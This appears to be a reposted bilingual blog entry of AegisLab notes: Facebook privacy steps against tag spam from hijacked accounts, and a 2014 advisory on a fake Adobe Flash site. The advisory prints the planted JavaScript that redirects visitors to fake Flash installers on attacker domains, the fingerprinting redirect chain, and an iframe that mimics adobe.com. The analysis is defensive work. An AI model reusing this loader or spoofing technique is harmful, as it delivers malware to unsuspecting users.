---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*-
*請小心擬真度百分之百且同步更新的假Adobe惡意網站!--
--安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing -
" to exclude malicious human behavior < -
"Strengthening your Facebook privacy settings --- >
"Let your shopping community from being annoying tag ~ ! ! And , And important information-
* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*! *
*塗鴉牆上出現了不少標記人的購物粉絲團,
有鞋子、衣服、包包…等五花八門的商品,
這些商品照片上會有一個Line的ID
但是最討人厭的莫過於它標記了大量的人,
不斷的出現在你的Facebook塗鴉牆
仔細一看,可以發現這些照片上,
被標記的人都是由「同一個人」所標註(如下圖)*
*Graffiti on the wall , there were many people shopping
fan group labeled ,
There are shoes, clothes, bags ... and other sorts of goods,
These products have a Line of photo ID
But the most annoying than it marked a lot of people,
Constantly appear on your Facebook wall
A closer look , you can find these photos ,
People are marked by the " same person "
marked ( see below)*
*原來,是那個標註大家在相片裡的人帳號被盜了,
其帳號被駭客所竊取後,
即會將其朋友標記在那些購物粉絲團的照片中。
AegisLab在此提供幾個步驟的簡單設定教學,
讓大家免於受這些購物粉絲社群標記所擾!
1). 首先,開啟你Facebook個人帳戶設定中--
--的「動態時報與標籤」,
我們來設定「誰可以在我的動態時報新增貼文?」--
--和「我該如何管理別人加上的標籤以及標籤建議?」這2個選項吧!
*It turned out that labeling everyone who is in the photo where the account was stolen,
After his account was stolen by hackers ,
That will mark his friend in the photo in those shopping fan group .
AegisLab provides a simple set of teaching several steps in this ,
Let us immune to these shopping fan community marked by disturbed !
1 ) First, open your Facebook personal account settings -
- The "Dynamic Times and labels "
We set "Who can add postings in my timeline ? " -
- And " How do I manage other people 's labels and tags plus suggestions ? " This two options it !
*
誰可以在你的動態時報上發佈文章?
可以設定是「朋友」或「只限本人」。
設定為「只限本人」,不怕被盜帳號的朋友在你的塗鴉牆上發文了!
*2 ) Set "Who can add text posted on my timeline ? "
Who can publish articles on your timeline ?
You can set a " friend " or " Only I ."
Is set to " Only I ," not afraid of the stolen account your friends Posting a graffiti wall !
是否要顯示在你的動態時報?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣標註你的貼文都必需透過你的審核,
才會顯示在你的動態時報。*Review your friends , including marked Posts ,
Do you want to appear in your timeline ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
Such labels are necessary for your postings through
your audit ,
Will appear in your timeline .
*3). 設定「我該如何管理別人加上的標籤以及標籤建議?」
標籤出現在 Facebook 之前,
先檢查別人貼在你貼文中的標籤?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣當有人要標記你時,
都必須經過你的審查,才會被允許標記。*3 ) Set " How do I manage other people 's labels and tags plus suggestions ? "
Labels appear before Facebook,
Someone posted on your first check the label affixed
to the text ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
So that when someone wants to tag you,
You must go through the review , will be allowed tag.
*
*當你被標註在貼文中時,
如果你要分享的朋友還沒在分享對象中,
你想加誰到分享名單?
可以設定為「朋友」、「只限本人」或「自訂」。
設定為「只限本人」,
這樣當你被標註在貼文時,
只有你自己會看到該貼文,
不會讓你的朋友們看到。
*When you paste the text is marked in time ,
If you are not a friend to share in the sharing of objects ,
Do you want to add a list of who to share ?
Can be set to "Friends ," " Only I " or "Custom ."
Is set to " Only I "
So that when you paste the text is marked in time ,
Only you will see the postings ,
Do not let your friends see .
*在有看起來像你的相片被上傳後,
誰可以看到姓名標籤建議?
可以設定為「朋友」或「沒有人」。
設定為「沒有人」,
這樣當有與你相像的照片被上傳後,
便不會出現你的姓名標籤建議了。
*There looks like in your photo is uploaded,
Who can see the name tag suggestions ?
Can be set to "friends" or " no one ."
Is set to " nobody "
So that when you have similar photos are uploaded ,
Your name will not appear label suggested .
*
*只要照著以上這些步驟,
那些惱人的購物社群要標記你時,
都得經過你審核才行,
而你被標記的貼文也只有你會看到,
不會影響到你Facebook上的好友了!
以上只是加強自己本身的隱私設定,
還必須讓身邊的朋友也知道這些隱私設定的重要性,
才能減少Facebook塗鴉牆上那些惱人的廣告訊息。
這些隱私設定都只是「治標」,
良好的使用習慣和基本的資安意識才是「治本」喔!
如何知道自己對哪些專頁按過讚及如何取消?
*Just follow these steps
Those annoying when you want to mark shopping community ,
You had to go through an audit job ,
And you paste text marked only you will see ,
Does not affect you, your friends on Facebook !
These are just strengthen its own privacy settings ,
You must also let her friends know the importance of these privacy settings,
Facebook Graffiti on the wall in order to reduce those
annoying advertising messages .
These privacy settings are only " temporary "
Good habits and basic information security awareness
is the " cure " Oh !
How do I know what special page on pressed praise and
how to cancel ?
*1). 點選「活動紀錄」
*1 ) Tap "Activity History"
*2). 點選「讚」、「專頁和興趣」
*2 ) Tap "Like" , " Fan Page and interests ."
*3).點選專頁右上方的編輯鈕,
即可「收回讚」或是檢舉對方 .
*3 ) Tap the Edit button at the top right special page ,
To " recover Like" or spotted each other.
------------------------------------------------------------------------
**再分享重要資訊--*請小心擬真度百分之百且同步更新的--
--假Adobe惡意網站!----安全通報2014-02-27~!*
AegisLab 近日發現了一個惡意網站: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/
_samples/api_dialog/js.html
我們可以看出此惡意的 js.html 是位於 cpanel 裡的 ckediter 目錄
cPanel為一個後台管理系統,讓你透過網頁方式管理你的網站
CKEditer為一個使用在網頁上的所見即所得文字編輯器
這2個元件的漏洞時有所聞:
*cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 – Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
我們推測是這2個元件的問題,
才讓駭客將惡意的 js.html 塞到該目錄下
*這個網站會先判斷你的瀏覽器類型和版本、
作業系統、IP、Flash版本、AdobeReader版本等資訊,
再將你導至不同的 URL 下載一個假--
--的 Flash Player 安裝檔,
部份原始碼如下↓ *
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| if ("" == "Windows 8") { if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); }} else { if ("" == "IE") { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); } } else { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); } }} |
*AegisLab所測試的惡意流程:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107
&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=
9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null
&IE_ActiveX=true
最後下載的假 Flash Player 安裝檔: hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe 
*(en)*
*cPanel is a backstage management system that
allows you to manage your way through the web site
CKEditer use on a website WYSIWYG text editor
Vulnerability of these two elements often heard :
cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
We speculate that these two elements are the problem ,
and will only let malicious hackers js.html stuffed
into that directory
This site will first determine your browser type and version, operating system , IP, Flash version ,
AdobeReader information such as version ,
You then lead to a different URL to download a fake -
- The Flash Player installation file ,
Part of the source code below ↓
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| if ("" == "Windows 8") { if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); }} else { if ("" == "IE") { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); } } else { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe"); } else if ( cr == "ils" ) { window.location.assign("http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe"); } else if ( cr == "ars" ) { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe"); } else if ( cr == "ila" ) { window.location.assign("http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe"); } else { window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe"); } }} |
*AegisLab tested malicious process:
hxxp :/ / www.ajyadgroup.net / old / ajyad_cpanel / ckeditor / _samples / api_dialog / js.html
→ hxxp :/ / 142.0.79.184/agent/agent.php? Cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_check.php? Ip = 114.44.216.107 & cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_save.php? Cr = ila & Browser_Type = IE & Browser_Version = 6.0 & OS = Windows + XP & OS_Version = & IP = 114.44.216.107
& referer = & Flash = 11,5,502,146 & Shockwave = null & Silverlight = null & VLC = null & WindowsMediaPlayer =
9,0,0,3250 & PDFReader = null & AdobeReader = 9,5,0,0 & DevalVR = null & QuickTime = null & RealPlayer = null
& IE_ActiveX = true
Finally, download the fake Flash Player installation file :
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
--------------------------------
*這個假的 Flash Player 為病毒,在virustotal的偵測率:(23/48) =
= https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
有趣的是…``
最後下載的PE URL的host -
adobeflashupdate1.com,
頁面看起來跟真的一模一樣,
這真的是 Adobe 官方的站嗎??!!@?
= Https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly ... `
Download the PE URL host the final -
adobeflashupdate1.com,
Page looks exactly the same with the real ,It
It's really is Adobe 's official stand it??!! @
*#左上方的 Adobe 標誌連結也是連到 www.adobe.com ,
但看其網頁原始碼就發現真相了!
1
2
3
4
5
6
7
8
9
| <html><body><iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0"><p>Your browser does not support iframes.</p></iframe></body></html> |
原來,它在裡面嵌了一個 www.adobe.com 的 iframe 在裡面,所以看起來才會跟 Adobe 官網一模一樣
adobeflashupdate1.com 在virustotal的偵測率:(7/53)
AegisLab WebGuard 已將 [D]adobeflashupdate1.com 加至rule中阻擋,提醒客戶隨時保持 WebGuard signature 的更新! -----------------------------
*en# Adobe logo at the top left link is also connected to www.adobe.com,
But looking at their page source discovered the truth !
1
2
3
4
5
6
7
8
9
| <html><body><iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0"><p>Your browser does not support iframes.</p></iframe></body></html> |
*Originally, it is embedded inside a www.adobe.com of -
- Iframe inside,
So it looks exactly the same only with Adobe 's official website ! ! !
adobeflashupdate1.com in virustotal detection rate: (7/53) =
= Https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has -
- [D] adobeflashupdate1.com
-added to the rule in the block ,
Remind customers to stay in WebGuard signature updates !*
**知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,
---> "讓你免於被惱人的購物社群標記~!!及 -重要資訊*請小心擬真度百分之百 -且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*
-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings
--- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-*Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!
===Sincerely === THE END === Melody.Blogger~===>/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
沒有留言:
張貼留言
if you like make fds, wellcome you here~~anytime***
my free place for everyones who want the good software,
come & download them~ wellcome!!